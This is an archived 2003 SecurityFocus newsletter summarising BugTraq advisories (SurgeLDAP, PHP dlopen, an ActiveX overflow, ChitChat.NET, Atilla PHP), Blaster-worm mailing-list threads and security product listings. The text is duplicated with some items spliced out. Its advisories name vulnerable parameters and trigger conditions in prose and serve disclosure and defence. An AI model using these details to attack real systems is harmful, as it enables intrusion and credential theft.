SecurityFocus Microsoft Newsletter # 151
----------------------------------------
This Issue is Sponsored by: KaVaDo
Your network firewall and IDS products do not prevent Web application
attacks - the most common form of online exploitation- resulting in Web
defacement, data theft, sabotage and fraud.
KaVaDo is the first and only company that provides a complete and
integrated suite of Web application security products, allowing you to:
- assess your entire Web environment with a Web Application Scanner,
- automatically set positive security policies for real-time protection,
and
- maintain such policies at the Application Firewall without
compromising business performance.
For more information on KaVaDo and to download a FREE white paper on
Security Policy Automation for Web Applications, please visit
I. FRONT AND CENTER
1. Slow Down Internet Worms With Tarpits
2. Penetration Testing for Web Applications (Part Three)
II. MICROSOFT VULNERABILITY SUMMARY
1. PHP DLOpen Memory Disclosure Vulnerability
2. SurgeLDAP Path Disclosure Vulnerability
3. SurgeLDAP User.CGI Cross-Site Scripting Vulnerability
4. SurgeLDAP HTTP GET Denial Of Service Vulnerability
5. SurgeLDAP Insecure Password Storage Vulnerability
6. Microsoft MCIWNDX.OCX ActiveX Control Buffer Overflow Vulner...
7. Clickcess ChitChat.NET Message HTML Injection Vulnerability
8. Microsoft URLScan / RSA Security SecurID Configuration Enume...
9. Atilla PHP Content Management System Multiple Web Vulnerabil...
III. MICROSOFT FOCUS LIST SUMMARY
1. Patch testing (Thread)
2. Patch Management Best Practices E-Seminar (Thread)
3. Article Announcement: Slow Down Internet Worms With ... (Thread)
4. MS03-033 not signed by Microsoft? (Thread)
5. DCOM patch + Exchange (Thread)
6. Mail from MSN Messenger (Thread)
7. scan of domain logon reveals unknown port (Thread)
8. SecurityFocus Microsoft Newsletter # 150 (Thread)
9. Article Announcement: MRTG for Intrusion Detection w... (Thread)
10. Why the shutdown if infected with blaster? (Thread)
11. DNS (Thread)
12. Account Lockout -- ARGH (Thread)
13. Account Lockuout --ARGH (Thread)
14. Detecting Blaster (Thread)
15. New variant. Blast.b (Thread)
16. FW: Actions for the Blaster Worm - Special Edition, ... (Thread)
17. MS03-029 ?-Download link (Thread)
18. FW: Blaster vs. Kaht2, detecting Windows root kits (Thread)
19. Administrivia: Blaster (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. Sophos Anti-Virus
2. F-Secure Policy Manager
3. Gordano Messaging Suite
4. LANDesk Management Suite 7
5. McAfee ePolicy Orchestrator
6. Enterprise Manager
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. Password Manager XP v1.5
2. beecrypt v3.1.0
3. Anti-Spam SMTP Proxy v1.0.0
4. ngrep v1.41
5. Securepoint Firewall and VPN Server v3.1.3 P3
6. libdvdcss v1.2.8
VI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Slow Down Internet Worms With Tarpits
By Tony Bautts
This timely article discusses how to slow the spread of Internet worms
using a tarpit and IPtables on Linux. A similar approach could potenially
be used with tarpits on Windows platforms, Solaris, OpenBSD, and others.
http://www.securityfocus.com/infocus/1723
2. Penetration Testing for Web Applications (Part Three)
By Jody Melbourne and David Jorm
The third and final article in this series investigates session security
issues and cookies, buffer overflows and logic flaws, and provides links
to further resources for the web application penetration tester. ... >>
http://www.securityfocus.com/infocus/1722
II. MICROSOFT VULNERABILITY SUMMARY
-----------------------------------
1. PHP DLOpen Memory Disclosure Vulnerability
BugTraq ID: 8405
Remote: No
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8405
Summary:
PHP is the Personal Home Page web application development suite. It is
available for the Unix, Linux, and Microsoft platforms.
A vulnerability has been reported to present itself in the dlopen()
function contained in the PHP source. The issue occurs when PHP is used in
conjunction with the Apache web server. It has been reported possible to
dump the contents of the Apache process memory into a text file. This
issue could be harnessed by a local attacker to gain access to potentially
sensitive information which could include authentication credentials.
Other exploits such as allowing an attacker to deliver different content
other than what the server is configured to serve, may also be possible.
It should be noted that dlopen() is a function contained in the PHP
source. It is not a PHP language function.
2. SurgeLDAP Path Disclosure Vulnerability
BugTraq ID: 8406
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8406
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP is prone to a path disclosure vulnerability. It is possible to
gain access to sensitive path information by issuing an HTTP GET request
for an invalid resource. This could help a remote attacker enumerate the
layout of the file system of the host running the vulnerable software,
which may be useful in further attacks against the host.
This issue exists in the web server component of SurgeLDAP.
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP is prone to cross-site scripting attacks. The issue exists in
the user.cgi script and is due to insufficient sanitization of data
supplied via URI parameters, which will be echoed back to users. Remote
attackers may exploit this issue by enticing a user to visit a malicious
link that specifies hostile HTML and script code as a value for the 'cmd'
parameter of the vulnerable script. This code may be rendered in the
user's browser when the link is visited. This would occur in the context
of the server.
Successful exploitation may allow theft of cookie-based authentication
credentials or other attacks.
This issue exists in the web server component of SurgeLDAP.
4. SurgeLDAP HTTP GET Denial Of Service Vulnerability
BugTraq ID: 8408
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8408
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP is prone to a denial of service vulnerability that may occur
when an overly long HTTP GET request is sent to the server. Though
unconfirmed, this may result in memory corruption, which may be further
exploitable to execute arbitrary code. It is reported that an HTTP GET
request of 501 or more characters will trigger this condition.
This issue exists in the web server component of SurgeLDAP.
5. SurgeLDAP Insecure Password Storage Vulnerability
BugTraq ID: 8409
Remote: No
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8409
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP does not adequately secure password credentials. These
credentials will be stored on the system hosting the server in plaintext
and could be exposed to users with local access to the system. On
Microsoft Windows, these credentials are reported to be stored in the
'user.dat' file in the program directory.
6. Microsoft MCIWNDX.OCX ActiveX Control Buffer Overflow Vulner...
BugTraq ID: 8413
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8413
Summary:
The 'mciwndx.ocx' ActiveX control is included in Microsoft Visual Studio 6
and supports multimedia programming.
'mciwndx.ocx' has been reported prone to a buffer overflow vulnerability.
The issue reportedly presents itself when excessive data (more than 640
kB) is passed to the "filename" property.
It has been conjectured that this issue could potentially lead to the
execution of code with the privileges of the user executing the web
browser. This problem requires that a user with the vulnerable control
installed visit a web page that invokes the control in a manner sufficient
to trigger the issue. Upon doing so, it may be possible to create a
remotely exploitable stack overflow condition that results in the
overwriting of sensitive process memory. This, however, has not been
confirmed.
It should be noted, that ActiveX controls by nature might contain latent
vulnerabilities. Caution should be employed if installing ActiveX
controls.
7. Clickcess ChitChat.NET Message HTML Injection Vulnerability
BugTraq ID: 8417
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8417
Summary:
Clickcess ChitChat.NET is a discussion forum designed specifically for use
with SQL Server and implemented in ASP.NET. It is available for Microsoft
Windows.
A vulnerability has been reported in the software that may allow
unsanitized user input to be injected into the website. This problem is
related to the Name and Topic Title input fields, which fail to properly
filter HTML and script code. Injected HTML code may be rendered in the
web browser of a victim who views vulnerable areas of the site. This would
occur in the security context of the site hosting ChitChat.NET.
This vulnerability could be exploited to steal cookie-based credential
from a host. Other attacks may well be possible.
8. Microsoft URLScan / RSA Security SecurID Configuration Enume...
BugTraq ID: 8419
Remote: Yes
Date Published: Aug 14 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8419
Summary:
Microsoft URLScan is an Internet Server API (ISAPI) filter that can be
configured to block a variety of HTTP methods, file extension access, and
other queries.
SecurID, a two-factor authentication mechanism developed by RSA Security,
can also be used to prevent unauthorized access to a website.
A weakness has been discovered in Microsoft URLScan and RSA Security
SecurID when used in conjunction on a web server. The problem is said to
occur due to the order in which the products are placed within the global
ISAPI filter list.
When the vulnerable configuration is in place, an attacker may be capable
of enumerating the Microsoft URLScan extension filtering list, by making
repeated requests to files with differing extensions. This is due to the
web server incorrectly returning a page, containing a hidden form field
that includes a 'referrer' NAME, and VALUE containing
'Rejected-By-UrlScan'. It should be noted that if the default
configuration has been changed, the rejection string may differ.
The enumeration of this type of information could potentially aid an
attacker when launching further attacks against the target web server.
9. Atilla PHP Content Management System Multiple Web Vulnerabil...
BugTraq ID: 8437
Remote: Yes
Date Published: Aug 18 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8437
Summary:
Atilla PHP is a PHP content management system designed for portal sites.
It is available for Unix, Linux, and Microsoft Windows platforms.
Several problems have been identified in Atilla PHP. Because of these
issues, and attacker may be able to gain access to sensitive information,
or execute code in the browsers of victims in the security context of the
vulnerable site.
Three problems have been identified in Atilla PHP.
Atilla PHP is vulnerable to a cross-site scripting issue. The index.php3
script does not properly filter input supplied to the Rubrique and article
URI variables.
Atilla PHP is also vulnerable to a script injection issue. The
user_action.php3 script does not properly filter user input, making it
possible to insert HTML and script that will be stored in a place where it
can be executed in the browsers of victims.
Finally, Atilla PHP is vulnerable to path disclosure issues in the
index.php3 script. By supplying a single quotation to the id, nrub, or
article variables of the index.php3 script, it is possible to gain
information about the installation path of the software.
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Patch testing (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334432
2. Patch Management Best Practices E-Seminar (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334430
3. Article Announcement: Slow Down Internet Worms With ... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334407
4. MS03-033 not signed by Microsoft? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334403
5. DCOM patch + Exchange (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334251
6. Mail from MSN Messenger (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334249
7. scan of domain logon reveals unknown port (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333826
8. SecurityFocus Microsoft Newsletter # 150 (Thread)
Relevant URL:
16. FW: Actions for the Blaster Worm - Special Edition, ... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333529
17. MS03-029 ?-Download link (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333516
18. FW: Blaster vs. Kaht2, detecting Windows root kits (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333498
19. Administrivia: Blaster (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333482
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. Sophos Anti-Virus
By: Sophos
Platforms: AIX, DOS, FreeBSD, HP-UX, Linux, MacOS, Netware, OS/2, Solaris,
UNIX, VMS, Windows 3.x, Windows 95/98, Windows NT
Relevant URL: http://www.sophos.com/products/sav/
Summary:
Sophos Anti-Virus is a unique solution to the virus problem, providing
true cross-platform protection in a single, fully integrated product. The
network-centric design provides a host of benefits for the protection of
servers, workstations and portables. Sophos's ground-breaking architecture
maximises protection, while minimising performance and administrative
overheads.
2. F-Secure Policy Manager
By: F-Secure Corporation
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.f-secure.com/products/policy-man/index.shtml
Summary:
With F-Secure Policy Manager, your system administrator can manage all the
critical security applications from antivirus protection to file and
network encryption from one single console. The administrator can
automatically and remotely install, configure and update the applications.
It is possible to manage the security applications on almost any device
and across the enterprise so that even the security of mobile workers'
laptops is guaranteed. In addition to all this, the administrator can
easily monitor the network by generating extensive reports on the security
status of the network.
3. Gordano Messaging Suite
By: Gordano
Platforms: AIX, Linux, Solaris, Windows 2000, Windows NT, Windows XP
Relevant URL: http://www.gordano.com/
Summary:
Gordano's Messaging Suite provides robust and secure email, instant and
SMS messaging for small, medium and large businesses.
4. LANDesk Management Suite 7
By: LANDesk Software
Platforms: AIX, HP-UX, Linux, MacOS, Solaris, Windows 2000, Windows 95/98,
Windows NT, Windows XP
Relevant URL: http://www.landesk.com/products/ilms/
Summary:
LANDesk Management Suite 7 is a comprehensive, integrated management
solution that's easy to use. Enabling proactive management of desktops,
server and mobile devices across heterogeneous IT environments.
- Keep up with security patches and virus updates
- Efficiently install and maintain software on the desktop
- Decrease software license costs and respond to audits
- Reduce the cost of helpdesk support
- Discover and manage hardware and software assets
- Migrate many users and their profiles to new operating systems
5. McAfee ePolicy Orchestrator
By: Network Associates
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.nai.com/us/products/mcafee/antivirus/fileserver/epo.htm
Summary:
McAfee Security ePolicy Orchestrator (ePO) is the market-leading tool for
centralized policy management of malicious threat protection. ePO allows
you to maintain up-to-date protection, configure and enforce policies, and
generate detailed graphical reports on McAfee Security and third party
products, including Symantec and Dr Ahn anti-virus products.
6. Enterprise Manager
By: Sophos
Platforms: Windows 2000, Windows NT
Relevant URL: http://www.sophos.com/products/em/
Summary:
The Enterprise Manager suite is a powerful set of tools allowing fully
automated web-based installation and updating of Sophos software across a
network and even to remote users.
Network administrators are put in full control and can monitor their
network at all times. Unprotected computers or those running an
out-of-date version of Sophos Anti-Virus can be immediately and
automatically updated. In practice, a network of 1000 or more clients can
be updated from a single, central Windows machine within five minutes.
V. NEW TOOLS FOR MICROSOFT PLATFORMS
------------------------------------
1. Password Manager XP v1.5
By: CP-Lab
Relevant URL: http://www.cp-lab.com
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Password Manager XP is a program that helps you to systematize any secret
information stored on your PC. It will be your passwords and secrets
keeper. Protect your private data with this password management utility.
Password Manager XP allows you to create several databases for storing
your secret information. Each database has an access password and is
encrypted with various algorithms at the same time (Blowfish, 3DES,
Rijndael, Tea, Cast128, RC4, Serpent, Twofish). You can store data in
different databases under your own passwords. You can create passwords
databases at shared resource and access them from multiple computers
across the network. Install to removable device Wizard will help you to
install the Password Manager XP to the removable devices such a USB flash
drives. It is easily integrated into Microsoft Internet Explorer. It helps
you to surf the Web more safely. Password Manager XP has a built-in
password generator with many adjustable functions.
2. beecrypt v3.1.0
By: Bob Deblier, bob.deblier (at) pandora (dot) be [email concealed]
Relevant URL: http://sourceforge.net/projects/beecrypt/
Platforms: Linux, Solaris, UNIX, Windows 2000, Windows 95/98, Windows NT
Summary:
BeeCrypt is an ongoing project to provide strong and fast cryptography in
the form of a toolkit usable by commercial and open source projects.
Included in the library are entropy sources, random generators, block
ciphers, hash functions, message authentication codes, multiprecision
integer routines, and public key primitives.
3. Anti-Spam SMTP Proxy v1.0.0
By: John Hanna
Relevant URL: http://assp.sourceforge.net/
Platforms: BSDI, Linux, MacOS, Os Independent, OS/2, Perl (any system
supporting perl), POSIX, Windows 2000, Windows NT
Summary:
The Anti-Spam SMTP Proxy (ASSP) Server project aims to create an open
source platform independent SMTP Proxy server which implements whitelists
and Bayesian filtering to help stop unsolicited commercial email (UCE).
Anti-spam tools should be adaptive to new spam and customized for each
site?s email patterns. This easy to use tool works with any mail transport
and achieves these goals requiring no operator intervention after the
initial setup phase.
4. ngrep v1.41
By: Jordan Ritter <jpr5 (at) darkridge (dot) com [email concealed]>
Relevant URL: http://ngrep.sourceforge.net/
Platforms: AIX, Digital UNIX/Alpha, FreeBSD, IRIX, Linux, OpenBSD,
Solaris, Windows 2000, Windows 95/98, Windows NT
Summary:
ngrep strives to provide most of GNU grep's common features, applying them
to the network layer. ngrep a pcap-aware tool that will allow you to
specify extended regular expressions to match against data payloads of
packets. It currently recognizes TCP and UDP across ethernet, ppp and slip
interfaces, and understands bpf filter logic in the same fashion as more
common packet sniffing tools like tcpdump and snoop.
5. Securepoint Firewall and VPN Server v3.1.3 P3
By: Lutz Hausmann
Relevant URL: http://www.securepoint.cc/
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT
Summary:
Securepoint Firewall and VPN Server is a high-performance application
designed to offer full protection for network assets. The Security Manager
offers a graphical user interface with many features, different
configurations, and advanced reporting functions. The Securepoint server
is a complete firewall and VPN software system with an operating system
based on a secure Linux. VPN operation supports PPTP and IPSec (X.509
certificates, preshared, RSA signature). You can use the firewall on a
standard PC with 2 to 16 network cards (including Ethernet, ADSL, ISDN).
It is very easy to install and administer. The Securepoint Security
Manager is available in English, German, and Spanish, and works in online
and offline mode.
6. libdvdcss v1.2.8
By: Samuel Hocevar <sam (at) zoy (dot) org [email concealed]>
Relevant URL: http://www.videolan.org/libdvdcss/
Platforms: BeOS, FreeBSD, Linux, OpenBSD, Windows 2000, Windows 95/98,
Windows NT
Summary:
libdvdcss is a cross-platform library for transparent DVD device access
with on the fly CSS decryption. It currently runs under Linux, FreeBSD,
NetBSD, OpenBSD, BSD/OS, Solaris, BeOS, Win98, Win2k and MacOS X. It is
used for the vlc DVD player because of its portability and because, unlike
similar libraries, it does not require your DVD drive to be region-locked.
VI. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored by: KaVaDo
Your network firewall and IDS products do not prevent Web application
attacks - the most common form of online exploitation- resulting in Web
defacement, data theft, sabotage and fraud.
KaVaDo is the first and only company that provides a complete and
integrated suite of Web application security products, allowing you to:
- assess your entire Web environment with a Web Application Scanner,
- automatically set positive security policies for real-time protection,
and
- maintain such policies at the Application Firewall without
compromising business performance.
For more information on KaVaDo and to download a FREE white paper on
Security Policy Automation for Web Applications, please visit
SecurityFocus Microsoft Newsletter # 151
----------------------------------------
This Issue is Sponsored by: KaVaDo
Your network firewall and IDS products do not prevent Web application
attacks - the most common form of online exploitation- resulting in Web
defacement, data theft, sabotage and fraud.
KaVaDo is the first and only company that provides a complete and
integrated suite of Web application security products, allowing you to:
- assess your entire Web environment with a Web Application Scanner,
- automatically set positive security policies for real-time protection,
and
- maintain such policies at the Application Firewall without
compromising business performance.
For more information on KaVaDo and to download a FREE white paper on
Security Policy Automation for Web Applications, please visit
http://www.securityfocus.com/sponsor/KaVaDo_ms-secnews_030825
------------------------------------------------------------------------
-------
I. FRONT AND CENTER
1. Slow Down Internet Worms With Tarpits
2. Penetration Testing for Web Applications (Part Three)
II. MICROSOFT VULNERABILITY SUMMARY
1. PHP DLOpen Memory Disclosure Vulnerability
2. SurgeLDAP Path Disclosure Vulnerability
3. SurgeLDAP User.CGI Cross-Site Scripting Vulnerability
4. SurgeLDAP HTTP GET Denial Of Service Vulnerability
5. SurgeLDAP Insecure Password Storage Vulnerability
6. Microsoft MCIWNDX.OCX ActiveX Control Buffer Overflow Vulner...
7. Clickcess ChitChat.NET Message HTML Injection Vulnerability
8. Microsoft URLScan / RSA Security SecurID Configuration Enume...
9. Atilla PHP Content Management System Multiple Web Vulnerabil...
III. MICROSOFT FOCUS LIST SUMMARY
1. Patch testing (Thread)
2. Patch Management Best Practices E-Seminar (Thread)
3. Article Announcement: Slow Down Internet Worms With ... (Thread)
4. MS03-033 not signed by Microsoft? (Thread)
5. DCOM patch + Exchange (Thread)
6. Mail from MSN Messenger (Thread)
7. scan of domain logon reveals unknown port (Thread)
8. SecurityFocus Microsoft Newsletter # 150 (Thread)
9. Article Announcement: MRTG for Intrusion Detection w... (Thread)
10. Why the shutdown if infected with blaster? (Thread)
11. DNS (Thread)
12. Account Lockout -- ARGH (Thread)
13. Account Lockuout --ARGH (Thread)
14. Detecting Blaster (Thread)
15. New variant. Blast.b (Thread)
16. FW: Actions for the Blaster Worm - Special Edition, ... (Thread)
17. MS03-029 ?-Download link (Thread)
18. FW: Blaster vs. Kaht2, detecting Windows root kits (Thread)
19. Administrivia: Blaster (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. Sophos Anti-Virus
2. F-Secure Policy Manager
3. Gordano Messaging Suite
4. LANDesk Management Suite 7
5. McAfee ePolicy Orchestrator
6. Enterprise Manager
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. Password Manager XP v1.5
2. beecrypt v3.1.0
3. Anti-Spam SMTP Proxy v1.0.0
4. ngrep v1.41
5. Securepoint Firewall and VPN Server v3.1.3 P3
6. libdvdcss v1.2.8
VI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Slow Down Internet Worms With Tarpits
By Tony Bautts
This timely article discusses how to slow the spread of Internet worms
using a tarpit and IPtables on Linux. A similar approach could potenially
be used with tarpits on Windows platforms, Solaris, OpenBSD, and others.
http://www.securityfocus.com/infocus/1723
2. Penetration Testing for Web Applications (Part Three)
By Jody Melbourne and David Jorm
The third and final article in this series investigates session security
issues and cookies, buffer overflows and logic flaws, and provides links
to further resources for the web application penetration tester. ... >>
http://www.securityfocus.com/infocus/1722
II. MICROSOFT VULNERABILITY SUMMARY
-----------------------------------
1. PHP DLOpen Memory Disclosure Vulnerability
BugTraq ID: 8405
Remote: No
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8405
Summary:
PHP is the Personal Home Page web application development suite. It is
available for the Unix, Linux, and Microsoft platforms.
A vulnerability has been reported to present itself in the dlopen()
function contained in the PHP source. The issue occurs when PHP is used in
conjunction with the Apache web server. It has been reported possible to
dump the contents of the Apache process memory into a text file. This
issue could be harnessed by a local attacker to gain access to potentially
sensitive information which could include authentication credentials.
Other exploits such as allowing an attacker to deliver different content
other than what the server is configured to serve, may also be possible.
It should be noted that dlopen() is a function contained in the PHP
source. It is not a PHP language function.
2. SurgeLDAP Path Disclosure Vulnerability
BugTraq ID: 8406
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8406
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP is prone to a path disclosure vulnerability. It is possible to
gain access to sensitive path information by issuing an HTTP GET request
for an invalid resource. This could help a remote attacker enumerate the
layout of the file system of the host running the vulnerable software,
which may be useful in further attacks against the host.
This issue exists in the web server component of SurgeLDAP.
3. SurgeLDAP User.CGI Cross-Site Scripting Vulnerability
BugTraq ID: 8407
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8407
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP is prone to cross-site scripting attacks. The issue exists in
the user.cgi script and is due to insufficient sanitization of data
supplied via URI parameters, which will be echoed back to users. Remote
attackers may exploit this issue by enticing a user to visit a malicious
link that specifies hostile HTML and script code as a value for the 'cmd'
parameter of the vulnerable script. This code may be rendered in the
user's browser when the link is visited. This would occur in the context
of the server.
Successful exploitation may allow theft of cookie-based authentication
credentials or other attacks.
This issue exists in the web server component of SurgeLDAP.
4. SurgeLDAP HTTP GET Denial Of Service Vulnerability
BugTraq ID: 8408
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8408
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP is prone to a denial of service vulnerability that may occur
when an overly long HTTP GET request is sent to the server. Though
unconfirmed, this may result in memory corruption, which may be further
exploitable to execute arbitrary code. It is reported that an HTTP GET
request of 501 or more characters will trigger this condition.
This issue exists in the web server component of SurgeLDAP.
5. SurgeLDAP Insecure Password Storage Vulnerability
BugTraq ID: 8409
Remote: No
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8409
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP does not adequately secure password credentials. These
credentials will be stored on the system hosting the server in plaintext
and could be exposed to users with local access to the system. On
Microsoft Windows, these credentials are reported to be stored in the
'user.dat' file in the program directory.
6. Microsoft MCIWNDX.OCX ActiveX Control Buffer Overflow Vulner...
BugTraq ID: 8413
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8413
Summary:
The 'mciwndx.ocx' ActiveX control is included in Microsoft Visual Studio 6
and supports multimedia programming.
'mciwndx.ocx' has been reported prone to a buffer overflow vulnerability.
The issue reportedly presents itself when excessive data (more than 640
kB) is passed to the "filename" property.
It has been conjectured that this issue could potentially lead to the
execution of code with the privileges of the user executing the web
browser. This problem requires that a user with the vulnerable control
installed visit a web page that invokes the control in a manner sufficient
to trigger the issue. Upon doing so, it may be possible to create a
remotely exploitable stack overflow condition that results in the
overwriting of sensitive process memory. This, however, has not been
confirmed.
It should be noted, that ActiveX controls by nature might contain latent
vulnerabilities. Caution should be employed if installing ActiveX
controls.
7. Clickcess ChitChat.NET Message HTML Injection Vulnerability
BugTraq ID: 8417
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8417
Summary:
Clickcess ChitChat.NET is a discussion forum designed specifically for use
with SQL Server and implemented in ASP.NET. It is available for Microsoft
Windows.
A vulnerability has been reported in the software that may allow
unsanitized user input to be injected into the website. This problem is
related to the Name and Topic Title input fields, which fail to properly
filter HTML and script code. Injected HTML code may be rendered in the
web browser of a victim who views vulnerable areas of the site. This would
occur in the security context of the site hosting ChitChat.NET.
This vulnerability could be exploited to steal cookie-based credential
from a host. Other attacks may well be possible.
8. Microsoft URLScan / RSA Security SecurID Configuration Enume...
BugTraq ID: 8419
Remote: Yes
Date Published: Aug 14 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8419
Summary:
Microsoft URLScan is an Internet Server API (ISAPI) filter that can be
configured to block a variety of HTTP methods, file extension access, and
other queries.
SecurID, a two-factor authentication mechanism developed by RSA Security,
can also be used to prevent unauthorized access to a website.
A weakness has been discovered in Microsoft URLScan and RSA Security
SecurID when used in conjunction on a web server. The problem is said to
occur due to the order in which the products are placed within the global
ISAPI filter list.
When the vulnerable configuration is in place, an attacker may be capable
of enumerating the Microsoft URLScan extension filtering list, by making
repeated requests to files with differing extensions. This is due to the
web server incorrectly returning a page, containing a hidden form field
that includes a 'referrer' NAME, and VALUE containing
'Rejected-By-UrlScan'. It should be noted that if the default
configuration has been changed, the rejection string may differ.
The enumeration of this type of information could potentially aid an
attacker when launching further attacks against the target web server.
9. Atilla PHP Content Management System Multiple Web Vulnerabil...
BugTraq ID: 8437
Remote: Yes
Date Published: Aug 18 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8437
Summary:
Atilla PHP is a PHP content management system designed for portal sites.
It is available for Unix, Linux, and Microsoft Windows platforms.
Several problems have been identified in Atilla PHP. Because of these
issues, and attacker may be able to gain access to sensitive information,
or execute code in the browsers of victims in the security context of the
vulnerable site.
Three problems have been identified in Atilla PHP.
Atilla PHP is vulnerable to a cross-site scripting issue. The index.php3
script does not properly filter input supplied to the Rubrique and article
URI variables.
Atilla PHP is also vulnerable to a script injection issue. The
user_action.php3 script does not properly filter user input, making it
possible to insert HTML and script that will be stored in a place where it
can be executed in the browsers of victims.
Finally, Atilla PHP is vulnerable to path disclosure issues in the
index.php3 script. By supplying a single quotation to the id, nrub, or
article variables of the index.php3 script, it is possible to gain
information about the installation path of the software.
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Patch testing (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334432
2. Patch Management Best Practices E-Seminar (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334430
3. Article Announcement: Slow Down Internet Worms With ... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334407
4. MS03-033 not signed by Microsoft? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334403
5. DCOM patch + Exchange (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334251
6. Mail from MSN Messenger (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334249
7. scan of domain logon reveals unknown port (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333826
8. SecurityFocus Microsoft Newsletter # 150 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333809
9. Article Announcement: MRTG for Intrusion Detection w... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333803
10. Why the shutdown if infected with blaster? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333799
11. DNS (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333797
12. Account Lockout -- ARGH (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333763
13. Account Lockuout --ARGH (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333753
14. Detecting Blaster (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333545
15. New variant. Blast.b (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333539
16. FW: Actions for the Blaster Worm - Special Edition, ... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333529
17. MS03-029 ?-Download link (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333516
18. FW: Blaster vs. Kaht2, detecting Windows root kits (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333498
19. Administrivia: Blaster (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333482
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. Sophos Anti-Virus
By: Sophos
Platforms: AIX, DOS, FreeBSD, HP-UX, Linux, MacOS, Netware, OS/2, Solaris,
UNIX, VMS, Windows 3.x, Windows 95/98, Windows NT
Relevant URL: http://www.sophos.com/products/sav/
Summary:
Sophos Anti-Virus is a unique solution to the virus problem, providing
true cross-platform protection in a single, fully integrated product. The
network-centric design provides a host of benefits for the protection of
servers, workstations and portables. Sophos's ground-breaking architecture
maximises protection, while minimising performance and administrative
overheads.
2. F-Secure Policy Manager
By: F-Secure Corporation
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.f-secure.com/products/policy-man/index.shtml
Summary:
With F-Secure Policy Manager, your system administrator can manage all the
